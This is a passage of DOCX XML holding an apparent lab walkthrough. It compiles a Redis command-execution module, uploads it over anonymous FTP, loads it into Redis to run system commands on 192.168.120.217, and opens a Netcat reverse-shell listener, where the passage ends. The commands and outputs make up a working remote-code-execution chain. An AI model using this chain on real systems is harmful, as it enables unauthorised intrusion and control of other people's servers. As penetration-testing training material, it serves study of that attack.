          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote: Enumerating objects: 494, done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002971">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote: Total 494 (delta 0), reused 0 (delta 0), pack-reused 494</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002972">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Receiving objects: 100% (494/494), 207.20 KiB | 349.00 KiB/s, done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002973">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resolving deltas: 100% (286/286), done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002974">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ cd RedisModules-ExecuteCommand</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002975">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~/RedisModules-ExecuteCommand$ make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002976">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make -C ./src</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002977">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make[1]: Entering directory '/home/kali/RedisModules-ExecuteCommand/src'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002978">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make -C ../rmutil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002979">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make[2]: Entering directory '/home/kali/RedisModules-ExecuteCommand/rmutil'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ld -o module.so module.o -shared -Bsymbolic  -L../rmutil -lrmutil -lc </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make[1]: Leaving directory '/home/kali/RedisModules-ExecuteCommand/src'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp ./src/module.so .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll upload our compiled module to the /pub directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002980">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002981">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~/RedisModules-ExecuteCommand$ ftp 192.168.120.217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002982">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connected to 192.168.120.217.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002983">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">220 (vsFTPd 3.0.2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002984">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name (192.168.120.217:kali): anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002985">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002986">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002987">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">230 Login successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002988">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote system type is UNIX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002989">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using binary mode to transfer files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; passive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive mode on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; cd pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">250 Directory successfully changed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; put module.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local: module.so remote: module.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002990">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">227 Entering Passive Mode (192,168,120,217,39,107).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002991">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">150 Ok to send data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002992">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002993">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">48560 bytes sent in 0.48 secs (98.7207 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002994">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; bye</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002995">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">221 Goodbye.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002996">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002997">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we must load our module into Redis, which will require some educated guesswork. Since we know the FTP service is running vsFTPd we can assume that it is using the default directory location (/var/ftp/) which means our module would have landed in /var/ftp/pub/module.so.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002998">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002999">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ telnet 192.168.120.217 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trying 192.168.120.217...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connected to 192.168.120.217.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escape character is '^]'.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MODULE LOAD /var/ftp/pub/module.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we've loaded our module, we can execute commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system.exec "id"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$51</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll start a Netcat handler to catch our reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -lvp 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
